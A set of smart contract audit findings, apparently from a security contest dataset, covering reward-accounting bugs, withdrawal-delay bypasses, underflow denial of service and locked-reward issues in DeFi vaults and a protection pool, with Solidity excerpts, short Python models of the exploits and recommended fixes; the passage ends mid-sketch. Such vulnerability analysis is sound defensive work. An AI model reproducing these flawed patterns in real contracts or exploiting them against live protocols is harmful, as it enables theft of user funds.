```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n
cachedUserRewards variable is never reset, so user can steal all rewards
high
The `cachedUserRewards` variable is never reset, so a user can steal all rewards.\\nWhen a user wants to withdraw, the `_withdrawUpdateRewardState` function is called. This function updates the internal reward state and claims rewards for the user if he provided `true` as the `claim_` param.\\n```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n\\nWhen the user calls claimRewards, the `cachedUserRewards` variable is added to the rewards he should receive. The problem is that `cachedUserRewards` is never reset to 0 once the user has claimed that amount.\\nBecause of that, he can claim multiple times in order to drain the token's entire balance.
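The repeated-claim effect can be sketched with a toy model (plain Python; the accounting is deliberately simplified and the names are illustrative, not the contract's):

```python
# Minimal model: cached rewards are paid on every claim but never cleared.
cached_user_rewards = 5 * 10**17   # amount pushed to the cache at withdrawal time
paid_out = 0

def claim_rewards(reset_cache):
    global cached_user_rewards, paid_out
    paid_out += cached_user_rewards
    if reset_cache:                # the step missing from _claimInternalRewards
        cached_user_rewards = 0

for _ in range(3):                 # attacker simply claims repeatedly
    claim_rewards(reset_cache=False)
```

Without the reset, three claims pay out three times the cached amount; with `reset_cache=True` only the first claim would pay.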
Once the user has received rewards, reset the `cachedUserRewards` variable to 0. This can be done inside the `_claimInternalRewards` function.
User can steal all rewards
```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n
User can receive more rewards through a mistake in the withdrawal logic
high
In the `withdraw()` function of the SingleSidedLiquidityVault the contract updates the reward state. Because of a mistake in the calculation, the user is assigned more rewards than they're supposed to.\\nWhen a user withdraws their funds, the `_withdrawUpdateRewardState()` function checks how many rewards those LP shares generated. If that amount is higher than the actual amount of reward tokens that the user claimed, the difference between those values is cached and the amount the user claimed is set to 0. That way they receive the remaining shares the next time they claim.\\nBut, the contract resets the number of reward tokens the user claimed before it computes the difference. That way, the full amount of reward tokens the LP shares generated are added to the cache.\\nHere's an example:\\nAlice deposits funds and receives 1e18 shares\\nAlice receives 1e17 rewards and claims those funds immediately\\nTime passes and Alice earns 5e17 more reward tokens\\nInstead of claiming those tokens, Alice withdraws 5e17 (50% of her shares) That executes `_withdrawUpdateRewardState()` with `lpAmount_ = 5e17` and claim = false:\\n```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = 
internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n
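The over-crediting in the example can be reduced to a few lines of arithmetic (a sketch; variable names mirror the contract's but the model is simplified):

```python
# Alice's numbers from the example (1e18-scaled)
reward_debt_diff = 3 * 10**17        # rewards attributable to the withdrawn LP
already_claimed = 1 * 10**17         # userRewardDebts before withdrawal

# Buggy order (as in the contract): the debt is zeroed before the subtraction
user_reward_debts = already_claimed
user_reward_debts = 0
cached_buggy = reward_debt_diff - user_reward_debts   # 3e17: over-credits Alice

# Fixed order: subtract first, then reset the debt
cached_fixed = reward_debt_diff - already_claimed     # 2e17
```

The difference between the two cached values is exactly the 1e17 Alice already claimed, which is the surplus she would receive again.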
First calculate `cachedUserRewards`, then reset `userRewardDebts`.
A user can receive more reward tokens than they should by abusing the withdrawal system.
```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n
Vault can experience long downtime periods
medium
The Chainlink price could stay up to 24 hours (heartbeat period) outside the boundaries defined by `THRESHOLD` but within the Chainlink deviation threshold. Deposits and withdrawals will not be possible during this period of time.\\nThe `_isPoolSafe()` function checks if the Balancer pool spot price is within the boundaries defined by `THRESHOLD` with respect to the last fetched Chainlink price.\\nSince in `_valueCollateral()` the `updateThreshold` should be 24 hours (as in the tests), the OHM derived oracle price could deviate by up to 2% from the on-chain trusted price. The value is 2% because in WstethLiquidityVault.sol#L223:\\n```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n\\n`stethPerWsteth` is mostly stable and changes in `stethUsd` and `ethUsd` will cancel out, so the return value changes will be close to changes in `ohmEth`, so up to 2% from the on-chain trusted price.\\nIf `THRESHOLD` < 2%, say 1% as in the tests, then the Chainlink price can deviate by more than 1% from the pool spot price and less than 2% from the on-chain trusted price for up to 24 hours. During this period withdrawals and deposits will revert.
`THRESHOLD` is not fixed and can be changed by the admin, meaning that it can take different values over time. Only a tight range of values around 2% should be allowed to avoid the scenario above.
Withdrawals and deposits can often be unavailable for several hours.
```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n
SingleSidedLiquidityVault.withdraw decreases ohmMinted, which makes the calculations involving ohmMinted incorrect
medium
SingleSidedLiquidityVault.withdraw decreases ohmMinted, which makes the calculations involving ohmMinted incorrect.\\nIn SingleSidedLiquidityVault, ohmMinted indicates the number of ohm minted in the contract, and ohmRemoved indicates the number of ohm burned in the contract. So the contract just needs to increase ohmMinted in deposit() and increase ohmRemoved in withdraw(). But withdraw() decreases ohmMinted, which makes the calculation involving ohmMinted incorrect.\\n```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n\\nConsider that a user minted 100 ohm in deposit() and immediately burned 100 ohm in withdraw().\\nIn _canDeposit, amount_ can now be as large as LIMIT + 100 instead of LIMIT\\n```\\n function _canDeposit(uint256 amount_) internal view virtual returns (bool) {\\n if (amount_ + ohmMinted > LIMIT + ohmRemoved) revert LiquidityVault_LimitViolation();\\n return true;\\n }\\n```\\n\\ngetOhmEmissions() returns removed = 100 instead of 0\\n```\\n function getOhmEmissions() external view returns (uint256 emitted, uint256 removed) {\\n uint256 currentPoolOhmShare = _getPoolOhmShare();\\n\\n if (ohmMinted > currentPoolOhmShare + ohmRemoved)\\n emitted = ohmMinted - currentPoolOhmShare - ohmRemoved;\\n else removed = currentPoolOhmShare + ohmRemoved - ohmMinted;\\n }\\n```\\n
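The two statements run sequentially, so the second ternary reads the already-decremented `ohmMinted`. A Python sketch of the mint-100/burn-100 example:

```python
# User mints 100 OHM, then burns 100 OHM on withdrawal
ohm_minted, ohm_removed = 100, 0
ohm_received = 100

# Buggy sequence from the contract
ohm_minted -= ohm_minted if ohm_received > ohm_minted else ohm_received   # -> 0
# second statement now sees ohm_minted == 0, so 100 > 0 is true
ohm_removed += (ohm_received - ohm_minted) if ohm_received > ohm_minted else 0

# Without the decrement (the recommended fix) nothing is counted as removed
fixed_minted, fixed_removed = 100, 0
fixed_removed += (ohm_received - fixed_minted) if ohm_received > fixed_minted else 0
```

The buggy path ends with `ohm_removed == 100` for a net-zero position, inflating the deposit limit and the emissions accounting.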
Remove the line that decreases ohmMinted in withdraw():\\n```\\n function withdraw(\\n uint256 lpAmount_,\\n uint256[] calldata minTokenAmounts_,\\n bool claim_\\n ) external onlyWhileActive nonReentrant returns (uint256) {\\n // Liquidity vaults should always be built around a two token pool so we can assume\\n // the array will always have two elements\\n if (lpAmount_ == 0 || minTokenAmounts_[0] == 0 || minTokenAmounts_[1] == 0)\\n revert LiquidityVault_InvalidParams();\\n if (!_isPoolSafe()) revert LiquidityVault_PoolImbalanced();\\n\\n _withdrawUpdateRewardState(lpAmount_, claim_);\\n\\n totalLP -= lpAmount_;\\n lpPositions[msg.sender] -= lpAmount_;\\n\\n // Withdraw OHM and pairToken from LP\\n (uint256 ohmReceived, uint256 pairTokenReceived) = _withdraw(lpAmount_, minTokenAmounts_);\\n\\n // Reduce deposit values\\n uint256 userDeposit = pairTokenDeposits[msg.sender];\\n pairTokenDeposits[msg.sender] -= pairTokenReceived > userDeposit\\n ? userDeposit\\n : pairTokenReceived;\\n- ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n
It will make the calculation involving ohmMinted incorrect.
```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n
SingleSidedLiquidityVault._accumulateInternalRewards will revert with an underflow error if rewardToken.lastRewardTime is greater than the current time
medium
SingleSidedLiquidityVault._accumulateInternalRewards will revert with an underflow error if rewardToken.lastRewardTime is greater than the current time.\\n```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n\\nThe relevant line is `uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime`. If `rewardToken.lastRewardTime > block.timestamp`, the function will revert and DoS the functions that use it.\\n```\\n function addInternalRewardToken(\\n address token_,\\n uint256 rewardsPerSecond_,\\n uint256 startTimestamp_\\n ) external onlyRole("liquidityvault_admin") {\\n InternalRewardToken memory newInternalRewardToken = InternalRewardToken({\\n token: token_,\\n decimalsAdjustment: 10**ERC20(token_).decimals(),\\n rewardsPerSecond: rewardsPerSecond_,\\n lastRewardTime: block.timestamp > startTimestamp_ ? block.timestamp : startTimestamp_,\\n accumulatedRewardsPerShare: 0\\n });\\n\\n\\n internalRewardTokens.push(newInternalRewardToken);\\n }\\n```\\n\\nIf `startTimestamp_` is in the future, it will be stored as `lastRewardTime` (`lastRewardTime: block.timestamp > startTimestamp_ ? block.timestamp : startTimestamp_`) and cause that problem.\\nUntil `startTimestamp_` is reached, `_accumulateInternalRewards` will not work, so the vault will be stopped. Of course, the admin can remove that token and everything will be fine again. That's why I think this is medium severity.
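One way to avoid the revert is a guard that skips tokens whose reward accrual has not started yet. A Python sketch of that logic (simplified model, illustrative names):

```python
NOW = 1_000_000  # fixed "block.timestamp" for determinism
tokens = [
    {"last_reward_time": NOW - 60, "rewards_per_second": 2},    # active token
    {"last_reward_time": NOW + 3600, "rewards_per_second": 2},  # starts in the future
]

def accumulate_internal_rewards(tokens, ts):
    rewards = []
    for t in tokens:
        if t["last_reward_time"] > ts:  # the suggested guard: skip, don't underflow
            rewards.append(0)
            continue
        rewards.append((ts - t["last_reward_time"]) * t["rewards_per_second"])
    return rewards

rewards = accumulate_internal_rewards(tokens, NOW)
```

The active token accrues `60 * 2 = 120` while the not-yet-started token contributes 0 instead of reverting the whole loop.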
Skip a token if its `lastRewardTime` is in the future.
SingleSidedLiquidityVault will be blocked
```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n
claimFees may cause some external rewards to be locked in the contract
medium
claimFees will update rewardToken.lastBalance so that if there are unaccrued reward tokens in the contract, users will not be able to claim them.\\n_accumulateExternalRewards takes the difference between the contract's reward token balance and lastBalance as the reward. and the accumulated reward tokens are updated by _updateExternalRewardState.\\n```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n\\nauraPool.rewardsPool.getReward can be called by anyone to send the reward tokens to the contract\\n```\\n function getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked 
rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n }\\n```\\n\\nHowever, in claimFees, the rewardToken.lastBalance will be updated to the current contract balance after the admin has claimed the fees.\\n```\\n function claimFees() external onlyRole("liquidityvault_admin") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nConsider the following scenario.\\nStart with rewardToken.lastBalance = 200.\\nAfter some time, the reward token balance in Aura increases by 100.\\nSomeone calls getReward to claim the reward tokens to the contract; the 100 new reward tokens have not yet been accrued via _accumulateExternalRewards and _updateExternalRewardState.\\nThe admin calls claimFees, which updates rewardToken.lastBalance to 290 (10 taken as fees).\\nUsers call claimRewards and receive 0 reward tokens; 90 reward tokens will be locked in the contract.
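The scenario reduces to a short balance walk-through (a sketch with deliberately simplified accounting):

```python
# rewardToken.lastBalance vs. the vault's actual reward-token balance
pool_balance = 200
last_balance = 200                 # rewardToken.lastBalance

pool_balance += 100                # getReward() pushes 100 un-accrued rewards
fees = 10
pool_balance -= fees               # claimFees() pays the fees...
last_balance = pool_balance        # ...and snapshots lastBalance = 290

accrued_next = pool_balance - last_balance   # what _accumulateExternalRewards sees
locked = 100 - fees                          # rewards users can never claim
```

Because the snapshot happens before the 100 tokens are accrued, the next accrual computes 0 and the remaining 90 tokens stay stuck.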
Use _accumulateExternalRewards and _updateExternalRewardState in claimFees to accrue rewards.\\n```\\n function claimFees() external onlyRole("liquidityvault_admin") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n+ uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n+ _updateExternalRewardState(i, accumulatedExternalRewards[i]);\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n
It will cause some external rewards to be locked in the contract
```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n
Protection sellers can bypass withdrawal delay mechanism and avoid losing funds when loans are defaulted by creating withdrawal request in each cycle
high
To prevent protection sellers from withdrawing funds immediately when protected lending pools default, there is a withdrawal delay mechanism, but it's possible to bypass it by creating a withdrawal request in each cycle; by doing so, a user can withdraw in each cycle's open state. There is no penalty for users who do this, and no check to prevent it.\\nThis is the `_requestWithdrawal()` code:\\n```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n\\nAs you can see, it doesn't keep track of the user's existing withdrawal requests, so a user can request withdrawal of his entire balance in each cycle, setting `withdrawalCycleDetails[Each Cycle][User]` to his full sToken balance. Whenever the user then wants to withdraw, he only needs to wait until the end of the current cycle, when he should have had to wait until the open period of the cycle after next.
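The bypass can be sketched with a toy model (assumed simplification; names are illustrative, not the contract's):

```python
# Nothing stops a seller from keeping a standing full-balance request,
# so a withdrawal is pre-approved in every cycle's open period.
balance = 1000
requests = {}   # withdrawal cycle index -> requested sToken amount

def request_withdrawal(current_cycle, amount):
    requests[current_cycle + 2] = amount   # withdrawable in cycle + 2

for cycle in range(1, 6):
    request_withdrawal(cycle, balance)     # re-request the full balance each cycle

approved_cycles = sorted(requests)
```

From cycle 3 onward every cycle has a full-balance withdrawal pre-approved, so the seller can exit the moment a pool turns late, defeating the delay.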
To avoid this, the code should keep track of both the user balance that is not under withdrawal delay and the balance already requested for withdrawal. To discourage users from requesting withdrawals and not executing them, the protocol should apply some penalty, for example the balance awaiting withdrawal should not earn rewards during the waiting period.
Protection sellers can request withdrawal of their full sToken balance in every cycle, and the code will allow them to withdraw at the end of each cycle, because it doesn't track how much of a user's balance was already requested for withdrawal in earlier cycles.
```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n
Lending pool state transition will be broken when a pool expires while in the Late state
high
Lending pool state transition will be broken when a pool expires while in the Late state\\n```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n\\nAs you can see, a pool is considered expired if the credit line's term has ended or the loan is fully repaid.\\nState transitions for a lending pool are handled inside the `DefaultStateManager._assessState` function. This function is responsible for locking capital when the state becomes Late and unlocking it when the state changes from Late back to Active.\\nBecause the first state checked is `Expired`, there are a few problems.\\nFirst problem: suppose the lending pool is in the Late state, so capital is locked. There are two options: the payment is made, the pool becomes Active again, and capital is unlocked; or the payment is not made and the pool defaults. But if, while the state is Late, the lending pool expires (the term ends or the loan is fully repaid), the capital will not be unlocked, because there is no Late -> Expired transition. The state will be changed to Expired and no further action will be taken. In this case it is also not possible to tell whether the lending pool expired because of time or because no payment was made.\\nSecond problem: the lending pool is in the Active state. The last payment should be made some time before `_creditLine.termEndTime()`. The payment is not made, which means the state should change to Late and capital should be locked, but the state is checked after the loan has ended, so it becomes Expired; again, no transition exists that can detect that capital should be locked in this case. The state will be changed to Expired and no further action will be taken.
These are tricky cases; the state machine should handle the Late -> Expired and Active -> Expired transitions explicitly, unlocking capital when the final payment was actually made and treating the pool as defaulted when it was not.
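One way to make the missing transition explicit is sketched below (a simplified state-machine model, not the contract's actual code; names are illustrative):

```python
# Simplified model: when a Late pool expires, resolve the locked capital
# explicitly instead of silently switching state and stranding the funds.

LATE, EXPIRED = "Late", "Expired"

def transition(current, new, last_payment_made, actions):
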